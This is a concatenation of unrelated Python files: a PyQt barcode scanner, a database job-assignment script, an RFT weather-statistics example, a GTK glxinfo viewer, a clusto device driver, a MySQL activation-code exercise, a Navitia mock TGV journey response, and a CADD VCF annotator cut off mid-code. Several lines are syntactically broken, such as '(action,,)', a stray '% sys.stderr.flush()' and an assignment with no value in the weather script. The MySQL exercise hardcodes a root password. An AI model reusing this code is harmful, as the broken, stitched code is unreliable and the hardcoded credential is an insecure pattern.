self.state[KEY_NUMLOCK]: string = numpadcodeToASCII[keyEvent.scancode] except BlockingIOError: # If no events are available, this is thrown # No actual error, move on pass @pyqtSlot() def shortcut_activated(self): barcode, ok = QInputDialog.getText(self.parent, "Scanner Input", self.shortcutMessage, QLineEdit.Normal, "", Qt.WindowSystemMenuHint | Qt.WindowTitleHint | Qt.WindowCloseButtonHint) if ok and barcode: self.barcodeReceived.emit(barcode) elif sys.platform.startswith("win32"): class BarcodeScanner(QObject): # Signal is emitted once a barcode has been scanned and received barcodeReceived = pyqtSignal(str) def __init__(self, parent, usbPortNumber, shortcut=None, scannerTitle=None): QObject.__init__(self, parent) self.parent = parent # There is no need to implement the actual barcode reader on Windows since we are using Raspberry Pi 3 # Set the current string buffer to none if shortcut is not None: self.shortcut = QShortcut(shortcut, self.parent) self.shortcut.activated.connect(self.shortcut_activated) if scannerTitle: self.shortcutMessage = "Enter %s barcode: " % scannerTitle else: self.shortcutMessage = "Enter barcode: " def setPort(self, usbPortNumber): # Do nothing pass def poll(self): # Do nothing in poll pass @pyqtSlot() def shortcut_activated(self): barcode, ok = QInputDialog.getText(self.parent, "Scanner Input", self.shortcutMessage, QLineEdit.Normal, "", Qt.WindowSystemMenuHint | Qt.WindowTitleHint | Qt.WindowCloseButtonHint) if ok and barcode: self.barcodeReceived.emit(barcode.strip())
from db import * import random from operator import itemgetter def get_min(): conn, cur = connection() cur.execute('SELECT minimum FROM jobs') draws = cur.fetchall() count = 0 for i in range(len(draws)): count += draws[i]['minimum'] return count def get_available(): conn, cur = connection() cur.execute('SELECT COUNT(*) FROM here') people = cur.fetchall() peoplenum = people[0]['COUNT(*)'] return peoplenum def get_job_total(): conn, cur = connection() cur.execute('SELECT job_total FROM here') ids = cur.fetchall() total = 0 for i in range(len(ids)): total += ids[i]['job_total'] conn.close() return total def high_low(): start = 0 conn, cur = connection() cur.execute('SELECT job_total, id FROM here') ids = cur.fetchall() for i in range(len(ids)): low = start high = start + ids[i]['job_total'] start = high ids[i]['low'] = low ids[i]['high'] = high conn.close() return ids def choose_people(): rangeDict = high_low() #print(len(rangeDict)) rangeList = list(high_low()) total = get_job_total() print('Total is ' + str(total)) count = get_min() idList = [] start = 0 ''' * I cant change the variable in range function when a for loop happens. If no Break, it breaks loop because pop happened * sometimes it is not found in list ''' for i in range(count): randnum = random.randint(1, total) # print(randnum) # found = False for j in range(len(rangeList)): if randnum > rangeList[j]['low'] and randnum <= rangeList[j]['high']: idList.append([rangeList[j]['id'], rangeList[j]['job_total']]) total -= rangeList[j]['job_total'] # print('FOUND ' + str(rangeList[j]['id'])) #print(total) rangeList.pop(j) # found = True break # if not found: # print('not found!!!') # print(rangeList) # print('TOTAL IS ' + str(total)) # found = False for k in range(len(rangeList)): low = start high = start + rangeList[k]['job_total'] start = high rangeList[k]['low'] = low rangeList[k]['high'] = high #print(rangeList) start = 0 idList.sort(key=itemgetter(1), reverse=True) conn, cur = connection() cur.execute('SELECT name, difficulty, minimum, id FROM jobs WHERE dump = 1') job = cur.fetchall() jobName = job[0]['name'] jobAmount = job[0]['difficulty'] jobId = job[0]['id'] for p in range(len(rangeDict)): found = False for q in range(len(idList)): if rangeDict[p]['id'] == idList[q][0]: found = True idnum = rangeDict[p]['id'] if not found: cur.execute('INSERT IGNORE INTO jobs_done(id, job_name, job_id, amount) VALUES(%s, %s, %s, %s)', (idnum, jobName, jobId, jobAmount)) conn.commit() cur.execute('INSERT INTO jobs_done_history(id, job_name, job_id, amount) VALUES(%s, %s, %s, %s)', (idnum, jobName, jobId, jobAmount)) conn.commit() cur.execute('UPDATE swimmers set job_total = job_total + %s WHERE id=%s', (int(jobAmount), idnum)) conn.commit() conn.close() return idList
import numpy as np from scipy.ndimage.filters import gaussian_filter1d from matplotlib import pyplot from spm1d import rft1d #(0) Load weather data: weather = #dictionay containing geographical locations ### choose two geographical locations: yA,yB = weather['Atlantic'], weather['Continental'] ### smooth: yA = gaussian_filter1d(yA, 8.0, axis=1, mode='wrap') yB = gaussian_filter1d(yB, 8.0, axis=1, mode='wrap') #(1) Two-sample t statistic (comparing just the two largest groups): nA,nB = yA.shape[0], yB.shape[0] #sample sizes mA,mB = yA.mean(axis=0), yB.mean(axis=0) #means sA,sB = yA.std(ddof=1, axis=0), yB.std(ddof=1, axis=0) #standard deviations s = np.sqrt( ((nA-1)*sA*sA + (nB-1)*sB*sB) / (nA + nB - 2) ) #pooled standard deviation t = (mA-mB) / ( s *np.sqrt(1.0/nA + 1.0/nB)) #t field #(2) Estimate field smoothness: rA,rB = yA-mA, yB-mB #residuals r = np.vstack([rA,rB]) FWHM = rft1d.geom.estimate_fwhm(r) #(3) Critical threshold (classical hypothesis testing): alpha = 0.05 df = nA + nB - 2 #degrees of freedom Q = yA.shape[1] #number of nodes (field length = Q-1) tstar = rft1d.t.isf(alpha, df, Q, FWHM) #inverse survival function #(4) Get upcrossing metrics: calc = rft1d.geom.ClusterMetricCalculator() k = calc.cluster_extents(t, tstar, interp=True) k_resels = [kk/FWHM for kk in k] nClusters = len(k) #(5) Probabilities: rftcalc = rft1d.prob.RFTCalculator(STAT='T', df=(1,df), nodes=Q, FWHM=FWHM) Pset = rftcalc.p.set(nClusters, min(k_resels), tstar) Pcluster = [rftcalc.p.cluster(kk, tstar) for kk in k_resels] #(6) Plot: pyplot.close('all') ax = pyplot.axes() ax.plot(t, 'k', lw=3, label='t field') ax.plot([0,Q], [tstar]*2, 'r--', label='Critical threshold') ### legend: ax.legend(loc='upper left') ### cluster p values: ax.text(10, 3.0, 'p = %.3f'%Pcluster[0]) ax.text(300, 3.6, 'p = %.3f'%Pcluster[1]) ax.text(280, 2.3, r'$\alpha$ = %.3f'%alpha, color='r') ### axis labels: ax.set_xlabel('Day', size=16) ax.set_ylabel('t value', size=16) ax.set_title('RFT-based inference of weather dataset', size=20)
import gi import os import Const gi.require_version("Gtk", "3.0") from gi.repository import Gtk from Common import setScreenSize, setBackgroundColor, createScrollbar FrameBufferList = ["vid", "vdep", "vt", "xsp", "bfsz", "lvl", "rt", "db", "st", "rsz", "gsz", "bsz", "asz", "flt", "srgb", "aux", "depth", "stcl", "acr", "acg", "acb", "aca", "msnum", "msbufs", "caveats"] def FrameBuffer(button): def GLXFB(button, value): FB_Store.clear() TreeFB.set_model(FB_Store) if value == 1: os.system( "glxinfo | awk '/GLX Visuals.*/{flag=1;next}/GLXFBConfigs.*/{flag=0}flag' | awk '/----.*/{flag=1;next}flag' > /tmp/FrameBufferGLXVisual.txt") list = [] with open("/tmp/FrameBufferGLXVisual.txt", "r") as file1: for line in file1: list.append(line.split()) for i in range(len(list) - 1): background_color = setBackgroundColor(i) FB_Store.append(list[i] + [background_color]) label = "%d GLX Visuals" % (len(list) - 1) button.set_label(label) if value == 2: os.system( "glxinfo | awk '/GLXFBConfigs.*/{flag=1;next}flag' | awk '/----.*/{flag=1;next}flag' > /tmp/FrameBufferGLXFBconfigs.txt") list = [] with open("/tmp/FrameBufferGLXFBconfigs.txt", "r") as file1: for line in file1: list.append(line.split()) for i in range(len(list) - 1): background_color = setBackgroundColor(i) if list[i][6] == "r" or list[i][6] == "c": pass else: list[i].insert(6, ".") FB_Store.append(list[i] + [background_color]) label = "%d GLXFBConfigs" % (len(list) - 1) button.set_label(label) FBWin = Gtk.Window() FBWin.set_title("GLX Frame Buffer Configuration") # FBWin.set_size_request(1000, 500) setScreenSize(FBWin, Const.WIDTH_RATIO, Const.HEIGHT_RATIO2) FBGrid = Gtk.Grid() FBWin.add(FBGrid) FBGrid.set_border_width(20) FBGrid.set_row_spacing(30) FBGLXButton = Gtk.RadioButton("GLX Visuals") FBGLXButton.connect("toggled", GLXFB, 1) FBGrid.add(FBGLXButton) FBConfigButton = Gtk.RadioButton.new_from_widget(FBGLXButton) FBConfigButton.set_label("GLXFBConfigs") FBConfigButton.connect("toggled", GLXFB, 2) FBGrid.attach_next_to(FBConfigButton, FBGLXButton, Gtk.PositionType.RIGHT, 1, 1) FBFrame = Gtk.Frame() FB_Store = Gtk.ListStore(str, str, str, str, str, str, str, str, str, str, str, str, str, str, str, str, str, str, str, str, str, str, str, str, str, str) TreeFB = Gtk.TreeView(FB_Store, expand=True) TreeFB.set_enable_search(True) TreeFB.set_property("enable-grid-lines", 3) FBConfigButton.set_active(True) FBGLXButton.set_active(True) for i, column_title in enumerate(FrameBufferList): FBrenderer = Gtk.CellRendererText(font=Const.FONT) column = Gtk.TreeViewColumn(column_title, FBrenderer, text=i) column.add_attribute(FBrenderer, "background", 25) if i < len(FrameBufferList) - 1: FBrenderer.set_alignment(0.5, 0.5) column.set_alignment(0.5) column.set_property("min-width", 40) TreeFB.append_column(column) FBScrollbar = createScrollbar(TreeFB) FBFrame.add(FBScrollbar) FBGrid.attach_next_to(FBFrame, FBGLXButton, Gtk.PositionType.BOTTOM, 25, 1) FBWin.show_all() # Gtk.main()
from clusto.drivers.base import Driver import sys class Device(Driver): _properties = {'model':None, 'serialnum':None, 'manufacturer':None} _clustotype = "device" _driver_name = "device" @classmethod def get_by_serial_number(self, serialnum): pass def _get_hostname(self): """return a hostname set for this device or its entity name""" hostname = self.attrs("hostname") if hostname: return hostname[0].value else: return def _set_hostname(self, name): self.set_attr("hostname", value=name) hostname = property(_get_hostname, _set_hostname) @property def fqdns(self): """return the fully qualified domain names for this device""" return self.attr_values("fqdn") def add_fqdn(self, fqdn): """add a fully qualified domain name""" if not self.has_attr("fqdn", number=True, value=fqdn): self.add_attr("fqdn", number=True, value=fqdn) def remove_fqdn(self, fqdn): """remove a fully qualified domain name""" self.del_attrs("fqdn", number=True, value=fqdn) def _power_captcha(self, action='reboot'): while True: sys.stdout.write('Are you sure you want to %s %s (yes/no)? ' % (action,,)) line = sys.stdin.readline().rstrip('\r\n') if line == 'yes': return True if line == 'no': return False sys.stdout.write('"yes" or "no", please\n') def power_on(self, captcha=True): if captcha and not self._power_captcha('power on'): return ports_set = 0 for porttype, ports in self.port_info.items(): if not porttype.startswith('pwr-'): continue for portnum, port in ports.items(): if not port['connection']: continue port['connection'].set_power_on(porttype, port['otherportnum']) ports_set += 1 return ports_set def power_off(self, captcha=True): if captcha and not self._power_captcha('power off'): return ports_set = 0 for porttype, ports in self.port_info.items(): if not porttype.startswith('pwr-'): continue for portnum, port in ports.items(): if not port['connection']: continue port['connection'].set_power_off(porttype, port['otherportnum']) ports_set += 1 return ports_set def power_reboot(self, captcha=True): if captcha and not self._power_captcha('reboot'): return ports_rebooted = 0 for porttype, ports in self.port_info.items(): if not porttype.startswith('pwr-'): continue for portnum, port in ports.items(): if not port['connection']: continue port['connection'].reboot(porttype, port['otherportnum']) ports_rebooted += 1 return ports_rebooted def console(self, ssh_user='root'): console = self.port_info['console-serial'][1] if not console['connection']: sys.stderr.write('No console connected to %s console-serial:1\n' % sys.stderr.flush() return if not hasattr(console['connection'], 'console'): sys.stderr.write('No console method on %s\n' % sys.stderr.flush() return console['connection'].connect('console-serial', console['otherportnum'], ssh_user)
#!/usr/bin/env python3 # -*- coding: utf-8 -*- '第 0002 题:将 0001 题生成的 200 个激活码(或者优惠券)保存到 MySQL 关系型数据库中。' __author__ = 'Drake-Z' import mysql.connector def write_to_mysql(filename): conn = mysql.connector.connect(user='root', password='986535', database='test') cursor = conn.cursor() cursor.execute("DROP TABLE IF EXISTS user") cursor.execute('create table user (id varchar(20) primary key, name varchar(20))') f = open(filename, 'r').readlines() for line, num in zip(f, range(1, len(f)+1)): line = line[:-1] #去除\n符号 cursor.execute('insert into user (id, name) values (%s, %s)', [str(num), line]) conn.commit() cursor.close() return 0 def search_mysql(): b = input('Search Active code(1-200):') conn = mysql.connector.connect(user='root', password='986535', database='test') cursor = conn.cursor() cursor.execute('select * from user where id = %s', (b,)) values = cursor.fetchall() print(values) cursor.close() conn.close() return 0 if __name__ == '__main__': filename = 'active_code.txt' write_to_mysql(filename) search_mysql()
# coding=utf-8 # # Copyright (c) 2001, Canal TP and/or its affiliates. All rights reserved. # # This file is part of Navitia, # the software to build cool stuff with public transport. # # Hope you'll enjoy and contribute to this project, # powered by Canal TP ( # Help us simplify mobility and open public transport: # a non ending quest to the responsive locomotion way of traveling! # # LICENCE: This program is free software; you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <>. # # Stay tuned using # twitter @navitia # [matrix] channel ( # # from __future__ import absolute_import, print_function, unicode_literals, division from tests.mock_navitia import navitia_response response = navitia_response.NavitiaResponse() response.queries = [ "vehicle_journeys/?depth=2&since=20121120T120100Z&headsign=9580&show_codes=true&until=20121120T214600Z" ] response.response_code = 200 response.json_response = """{ "pagination": { "start_page": 0, "items_on_page": 1, "items_per_page": 25, "total_result": 1 }, "links": [ { "href": "http://localhost:5001/v1/coverage/stif/stop_points/{}", "type": "stop_point", "rel": "stop_points", "templated": true }, { "href": "http://localhost:5001/v1/coverage/stif/stop_areas/{}", "type": "stop_area", "rel": "stop_areas", "templated": true }, { "href": "http://localhost:5001/v1/coverage/stif/journey_patterns/{}", "type": "journey_pattern", "rel": "journey_patterns", "templated": true }, { "href": "http://localhost:5001/v1/coverage/stif/routes/{}", "type": "route", "rel": "routes", "templated": true }, { "href": "http://localhost:5001/v1/coverage/stif/journey_pattern_points/{}", "type": "journey_pattern_point", "rel": "journey_pattern_points", "templated": true }, { "href": "http://localhost:5001/v1/coverage/stif/vehicle_journeys/{}", "type": "vehicle_journeys", "rel": "vehicle_journeys", "templated": true }, { "href": "http://localhost:5001/v1/coverage/stif/trips/{}", "type": "trip", "rel": "trips", "templated": true }, { "href": "http://localhost:5001/v1/coverage/stif/vehicle_journeys?depth=2&since=20121120T115800%2B0000&until=20121120T214630%2B0000&headsign=9580", "type": "first", "templated": false } ], "disruptions": [], "feed_publishers": [], "context": { "timezone": "Europe/Paris", "current_datetime": "20190515T111555" }, "vehicle_journeys": [ { "codes": [], "name": "9580", "journey_pattern": { "route": { "direction": { "embedded_type": "stop_area", "stop_area": { "codes": [ { "type": "CR-CI-CH", "value": "0087-751008-BV" }, { "type": "UIC8", "value": "87751008" }, { "type": "external_code", "value": "OCE87751008" } ], "name": "gare de Marseille-St-Charles", "links": [], "coord": { "lat": "43.30273", "lon": "5.380659" }, "label": "gare de Marseille-St-Charles (Marseille)", "timezone": "Europe/Paris", "id": "stop_area:OCE:SA:87751008" }, "quality": 0, "name": "gare de Marseille-St-Charles (Marseille)", "id": "stop_area:OCE:SA:87751008" }, "name": "Frankfurt-am-Main-Hbf vers Marseille-St-Charles", "links": [], "is_frequence": "False", "geojson": { "type": "MultiLineString", "coordinates": [] }, "direction_type": "forward", "id": "route:OCE:TGV-80110684-87751008-1" }, "id": "journey_pattern:7491", "name": "journey_pattern:7491" }, "disruptions": [], "calendars": [ { "exceptions": [ { "type": "remove", "datetime": "20121201" } ], "active_periods": [ { "begin": "20121029", "end": "20121208" } ], "week_pattern": { "monday": true, "tuesday": true, "friday": true, "wednesday": true, "thursday": true, "sunday": true, "saturday": true } } ], "stop_times": [ { "stop_point": { "name": "gare de Frankfurt-am-Main-Hbf", "links": [], "coord": { "lat": "0", "lon": "0" }, "label": "gare de Frankfurt-am-Main-Hbf", "equipments": [], "fare_zone": { "name": "0" }, "id": "stop_point:OCE:SP:TGV-80110684", "stop_area": { "codes": [ { "type": "CR-CI-CH", "value": "0080-110684-00" }, { "type": "UIC8", "value": "80110684" }, { "type": "external_code", "value": "OCE80110684" } ], "name": "gare de Frankfurt-am-Main-Hbf", "links": [], "coord": { "lat": "0", "lon": "0" }, "label": "gare de Frankfurt-am-Main-Hbf", "timezone": "Europe/Paris", "id": "stop_area:OCE:SA:80110684" } }, "utc_arrival_time": "130100", "utc_departure_time": "130100", "headsign": "9580", "arrival_time": "140100", "journey_pattern_point": { "id": "journey_pattern_point:71093" }, "departure_time": "140100" }, { "stop_point": { "name": "gare de Mannheim-Hbf", "links": [], "coord": { "lat": "0", "lon": "0" }, "label": "gare de Mannheim-Hbf", "equipments": [], "fare_zone": { "name": "0" }, "id": "stop_point:OCE:SP:TGV-80140087", "stop_area": { "codes": [ { "type": "CR-CI-CH", "value": "0080-140087-BV" }, { "type": "UIC8", "value": "80140087" }, { "type": "external_code", "value": "OCE80140087" } ], "name": "gare de Mannheim-Hbf", "links": [], "coord": { "lat": "0", "lon": "0" }, "label": "gare de Mannheim-Hbf", "timezone": "Europe/Paris", "id": "stop_area:OCE:SA:80140087" } }, "utc_arrival_time": "133700", "utc_departure_time": "134000", "headsign": "9580", "arrival_time": "143700", "journey_pattern_point": { "id": "journey_pattern_point:71094" }, "departure_time": "144000" }, { "stop_point": { "name": "gare de Karlsruhe-Hbf", "links": [], "coord": { "lat": "0", "lon": "0" }, "label": "gare de Karlsruhe-Hbf", "equipments": [], "fare_zone": { "name": "0" }, "id": "stop_point:OCE:SP:TGV-80142281", "stop_area": { "codes": [ { "type": "CR-CI-CH", "value": "0080-142281-BV" }, { "type": "UIC8", "value": "80142281" }, { "type": "external_code", "value": "OCE80142281" } ], "name": "gare de Karlsruhe-Hbf", "links": [], "coord": { "lat": "0", "lon": "0" }, "label": "gare de Karlsruhe-Hbf", "timezone": "Europe/Paris", "id": "stop_area:OCE:SA:80142281" } }, "utc_arrival_time": "140200", "utc_departure_time": "141200", "headsign": "9580", "arrival_time": "150200", "journey_pattern_point": { "id": "journey_pattern_point:71095" }, "departure_time": "151200" }, { "stop_point": { "name": "gare de Baden-Baden", "links": [], "coord": { "lat": "0", "lon": "0" }, "label": "gare de Baden-Baden", "equipments": [], "fare_zone": { "name": "0" }, "id": "stop_point:OCE:SP:TGV-80142778", "stop_area": { "codes": [ { "type": "CR-CI-CH", "value": "0080-142778-BV" }, { "type": "UIC8", "value": "80142778" }, { "type": "external_code", "value": "OCE80142778" } ], "name": "gare de Baden-Baden", "links": [], "coord": { "lat": "0", "lon": "0" }, "label": "gare de Baden-Baden", "timezone": "Europe/Paris", "id": "stop_area:OCE:SA:80142778" } }, "utc_arrival_time": "143100", "utc_departure_time": "143400", "headsign": "9580", "arrival_time": "153100", "journey_pattern_point": { "id": "journey_pattern_point:71096" }, "departure_time": "153400" }, { "stop_point": { "name": "gare de Strasbourg", "links": [], "coord": { "lat": "48.585151", "lon": "7.733945" }, "label": "gare de Strasbourg (Strasbourg)", "equipments": [], "administrative_regions": [ { "insee": "67482", "name": "Strasbourg", "level": 8, "coord": { "lat": "48.584614", "lon": "7.750712" }, "label": "Strasbourg (67000-67200)", "id": "admin:fr:67482", "zip_code": "67000;67200" } ], "fare_zone": { "name": "0" }, "id": "stop_point:OCE:SP:TGV-87212027", "stop_area": { "codes": [ { "type": "CR-CI-CH", "value": "0087-212027-BV" }, { "type": "UIC8", "value": "87212027" }, { "type": "external_code", "value": "OCE87212027" } ], "name": "gare de Strasbourg", "links": [], "coord": { "lat": "48.585151", "lon": "7.733945" }, "label": "gare de Strasbourg (Strasbourg)", "timezone": "Europe/Paris", "id": "stop_area:OCE:SA:87212027" } }, "utc_arrival_time": "150300", "utc_departure_time": "151200", "headsign": "9581", "arrival_time": "160300", "journey_pattern_point": { "id": "journey_pattern_point:71097" }, "departure_time": "161200" }, { "stop_point": { "name": "gare de Mulhouse", "links": [], "coord": { "lat": "47.741786", "lon": "7.342833" }, "label": "gare de Mulhouse (Mulhouse)", "equipments": [], "administrative_regions": [ { "insee": "68224", "name": "Mulhouse", "level": 8, "coord": { "lat": "47.749416", "lon": "7.339935" }, "label": "Mulhouse (68100-68200)", "id": "admin:fr:68224", "zip_code": "68100;68200" } ], "fare_zone": { "name": "0" }, "id": "stop_point:OCE:SP:TGV-87182063", "stop_area": { "codes": [ { "type": "CR-CI-CH", "value": "0087-182063-BV" }, { "type": "UIC8", "value": "87182063" }, { "type": "external_code", "value": "OCE87182063" } ], "name": "gare de Mulhouse", "links": [], "coord": { "lat": "47.741786", "lon": "7.342833" }, "label": "gare de Mulhouse (Mulhouse)", "timezone": "Europe/Paris", "id": "stop_area:OCE:SA:87182063" } }, "utc_arrival_time": "155900", "utc_departure_time": "160800", "headsign": "9580", "arrival_time": "165900", "journey_pattern_point": { "id": "journey_pattern_point:71098" }, "departure_time": "170800" }, { "stop_point": { "name": "gare de Belfort-Montbéliard-TGV", "links": [], "coord": { "lat": "47.586579", "lon": "6.899019" }, "label": "gare de Belfort-Montbéliard-TGV (Meroux)", "equipments": [], "administrative_regions": [ { "insee": "90068", "name": "Meroux", "level": 8, "coord": { "lat": "47.596069", "lon": "6.899145" }, "label": "Meroux (90400)", "id": "admin:fr:90068", "zip_code": "90400" } ], "fare_zone": { "name": "0" }, "id": "stop_point:OCE:SP:TGV-87300822", "stop_area": { "codes": [ { "type": "CR-CI-CH", "value": "0087-300822-BV" }, { "type": "UIC8", "value": "87300822" }, { "type": "external_code", "value": "OCE87300822" } ], "name": "gare de Belfort-Montbéliard-TGV", "links": [], "coord": { "lat": "47.586579", "lon": "6.899019" }, "label": "gare de Belfort-Montbéliard-TGV (Meroux)", "timezone": "Europe/Paris", "id": "stop_area:OCE:SA:87300822" } }, "utc_arrival_time": "163000", "utc_departure_time": "163300", "headsign": "9580", "arrival_time": "173000", "journey_pattern_point": { "id": "journey_pattern_point:71099" }, "departure_time": "173300" }, { "stop_point": { "name": "gare de Besançon-Franche-Comté", "links": [], "coord": { "lat": "47.30746", "lon": "5.954751" }, "label": "gare de Besançon-Franche-Comté (Les Auxons)", "equipments": [], "administrative_regions": [ { "insee": "25035", "name": "Les Auxons", "level": 8, "coord": { "lat": "47.301167", "lon": "5.957158" }, "label": "Les Auxons (25870)", "id": "admin:fr:25035", "zip_code": "25870" } ], "fare_zone": { "name": "0" }, "id": "stop_point:OCE:SP:TGV-87300863", "stop_area": { "codes": [ { "type": "CR-CI-CH", "value": "0087-300863-BV" }, { "type": "UIC8", "value": "87300863" }, { "type": "external_code", "value": "OCE87300863" } ], "name": "gare de Besançon-Franche-Comté", "links": [], "coord": { "lat": "47.30746", "lon": "5.954751" }, "label": "gare de Besançon-Franche-Comté (Les Auxons)", "timezone": "Europe/Paris", "id": "stop_area:OCE:SA:87300863" } }, "utc_arrival_time": "165400", "utc_departure_time": "165900", "headsign": "9580", "arrival_time": "175400", "journey_pattern_point": { "id": "journey_pattern_point:71100" }, "departure_time": "175900" }, { "stop_point": { "name": "gare de Chalon-sur-Saône", "links": [], "coord": { "lat": "46.781666", "lon": "4.84323" }, "label": "gare de Chalon-sur-Saône (Chalon-sur-Saône)", "equipments": [], "administrative_regions": [ { "insee": "71076", "name": "Chalon-sur-Saône", "level": 8, "coord": { "lat": "46.788898", "lon": "4.85296" }, "label": "Chalon-sur-Saône (71100)", "id": "admin:fr:71076", "zip_code": "71100" } ], "fare_zone": { "name": "0" }, "id": "stop_point:OCE:SP:TGV-87725002", "stop_area": { "codes": [ { "type": "CR-CI-CH", "value": "0087-725002-BV" }, { "type": "UIC8", "value": "87725002" }, { "type": "external_code", "value": "OCE87725002" } ], "name": "gare de Chalon-sur-Saône", "links": [], "coord": { "lat": "46.781666", "lon": "4.84323" }, "label": "gare de Chalon-sur-Saône (Chalon-sur-Saône)", "timezone": "Europe/Paris", "id": "stop_area:OCE:SA:87725002" } }, "utc_arrival_time": "175400", "utc_departure_time": "175600", "headsign": "9581", "arrival_time": "185400", "journey_pattern_point": { "id": "journey_pattern_point:71101" }, "departure_time": "185600" }, { "stop_point": { "name": "gare de Lyon-Part-Dieu", "links": [], "coord": { "lat": "45.76058", "lon": "4.859438" }, "label": "gare de Lyon-Part-Dieu (Lyon)", "equipments": [], "administrative_regions": [ { "insee": "69123", "name": "Lyon", "level": 8, "coord": { "lat": "45.757812", "lon": "4.832011" }, "label": "Lyon (69001-69009)", "id": "admin:fr:69123", "zip_code": "69001;69009" }, { "insee": "69383", "name": "Lyon 3e Arrondissement", "level": 9, "coord": { "lat": "45.759933", "lon": "4.849389" }, "label": "Lyon 3e Arrondissement (69003)", "id": "admin:fr:69383", "zip_code": "69003" } ], "fare_zone": { "name": "0" }, "id": "stop_point:OCE:SP:TGV-87723197", "stop_area": { "codes": [ { "type": "CR-CI-CH", "value": "0087-723197-BV" }, { "type": "UIC8", "value": "87723197" }, { "type": "external_code", "value": "OCE87723197" } ], "name": "gare de Lyon-Part-Dieu", "links": [], "coord": { "lat": "45.76058", "lon": "4.859438" }, "label": "gare de Lyon-Part-Dieu (Lyon)", "timezone": "Europe/Paris", "id": "stop_area:OCE:SA:87723197" } }, "utc_arrival_time": "185600", "utc_departure_time": "190600", "headsign": "9581", "arrival_time": "195600", "journey_pattern_point": { "id": "journey_pattern_point:71102" }, "departure_time": "200600" }, { "stop_point": { "name": "gare de Avignon-TGV", "links": [], "coord": { "lat": "43.921963", "lon": "4.78616" }, "label": "gare de Avignon-TGV (Avignon)", "equipments": [], "administrative_regions": [ { "insee": "84007", "name": "Avignon", "level": 8, "coord": { "lat": "43.949314", "lon": "4.806032" }, "label": "Avignon (84000)", "id": "admin:fr:84007", "zip_code": "84000" } ], "fare_zone": { "name": "0" }, "id": "stop_point:OCE:SP:TGV-87318964", "stop_area": { "codes": [ { "type": "CR-CI-CH", "value": "0087-318964-BV" }, { "type": "UIC8", "value": "87318964" }, { "type": "external_code", "value": "OCE87318964" } ], "name": "gare de Avignon-TGV", "links": [], "coord": { "lat": "43.921963", "lon": "4.78616" }, "label": "gare de Avignon-TGV (Avignon)", "timezone": "Europe/Paris", "id": "stop_area:OCE:SA:87318964" } }, "utc_arrival_time": "200800", "utc_departure_time": "201100", "headsign": "9581", "arrival_time": "210800", "journey_pattern_point": { "id": "journey_pattern_point:71103" }, "departure_time": "211100" }, { "stop_point": { "name": "gare de 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"journey_pattern_point": { "id": "journey_pattern_point:71104" }, "departure_time": "213400" }, { "stop_point": { "name": "gare de Marseille-St-Charles", "links": [], "coord": { "lat": "43.30273", "lon": "5.380659" }, "label": "gare de Marseille-St-Charles (Marseille)", "equipments": [], "administrative_regions": [ { "insee": "13055", "name": "Marseille", "level": 8, "coord": { "lat": "43.296173", "lon": "5.369952" }, "label": "Marseille (13000-13016)", "id": "admin:fr:13055", "zip_code": "13000;13016" } ], "fare_zone": { "name": "0" }, "id": "stop_point:OCE:SP:TGV-87751008", "stop_area": { "codes": [ { "type": "CR-CI-CH", "value": "0087-751008-BV" }, { "type": "UIC8", "value": "87751008" }, { "type": "external_code", "value": "OCE87751008" } ], "name": "gare de Marseille-St-Charles", "links": [], "coord": { "lat": "43.30273", "lon": "5.380659" }, "label": "gare de Marseille-St-Charles (Marseille)", "timezone": "Europe/Paris", "id": "stop_area:OCE:SA:87751008" } }, "utc_arrival_time": "204600", "utc_departure_time": "204600", "headsign": "9581", "arrival_time": "214600", "journey_pattern_point": { "id": "journey_pattern_point:71105" }, "departure_time": "214600" } ], "validity_pattern": { "beginning_date": "20120913", "days": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111101111111111111111111111111111111110000000000000000000000000000000000000000000000" }, "id": "vehicle_journey:OCE:SN009580F03012_dst_1", "trip": { "id": "OCE:SN009580F03012", "name": "9580" } } ] }"""
## Copyright (C) 2011 Stellenbosch University ## ## This file is part of SUCEM. ## ## SUCEM is free software: you can redistribute it and/or modify ## it under the terms of the GNU General Public License as published by ## the Free Software Foundation, either version 3 of the License, or ## (at your option) any later version. ## ## SUCEM is distributed in the hope that it will be useful, ## but WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ## GNU General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## along with SUCEM. If not, see <>. ## ## Contact: # Authors: # Neilen Marais <> import dolfin from dolfin import dot get_r_hat = lambda : dolfin.Expression( ['sin(theta)*cos(phi)', 'sin(theta)*sin(phi)', 'cos(theta)'], theta=0, phi=0) get_k0 = lambda : dolfin.Expression('k0', k0=0) get_theta_hat = lambda : dolfin.Expression( ['cos(theta)*cos(phi)', 'cos(theta)*sin(phi)', '-sin(theta)'], theta=0, phi=0) get_phi_hat = lambda : dolfin.Expression(['-sin(phi)', 'cos(phi)', '0.'], phi=0) get_phase = lambda k0, rprime, r_hat : k0*dot(rprime, r_hat) get_3d_vector = lambda : dolfin.Expression(['x1', 'x2', 'x3'], x1=0, x2=0, x3=0)
#!/usr/bin/python import sys, os import vcf import tabix from time import time from time import sleep import multiprocessing as mp from optparse import OptionParser """ CADD FORMAT #Chrom Pos Ref Alt RawScore PHRED 1 10001 T A 0.176634 5.959 1 10001 T C 0.114925 5.063 """ parser = OptionParser() parser.add_option("--vcf", dest="vcf_file", help="Path to VCF to annotate", default=False) parser.add_option("--snv", dest="cadd_snvs", help="Path to prescored SNVs", default=False) parser.add_option("--indel", dest="cadd_indels", help="Path to prescored InDels", default=False) parser.add_option("--t", dest="nr_cpus", help="Number of CPUs to use", default=8) parser.add_option("--out", dest="out_file", help="Path to output VCF file", default="out.vcf") (options, args) = parser.parse_args() def check_arguments(options): #print("Checking arguments") if not options.vcf_file or not os.path.exists(options.vcf_file): print("Invalid VCF file %s"%(options.vcf_file)) return False # ---- SNV file --- if not options.cadd_snvs or not os.path.exists(options.cadd_snvs): print("Invalid CADD SNV file %s"%(options.cadd_snvs)) return False if not os.path.exists(options.cadd_snvs+".tbi"): print("No Index for CADD SNV file %s"%(options.cadd_snvs+".tbi")) return False # ---- InDel file --- if not 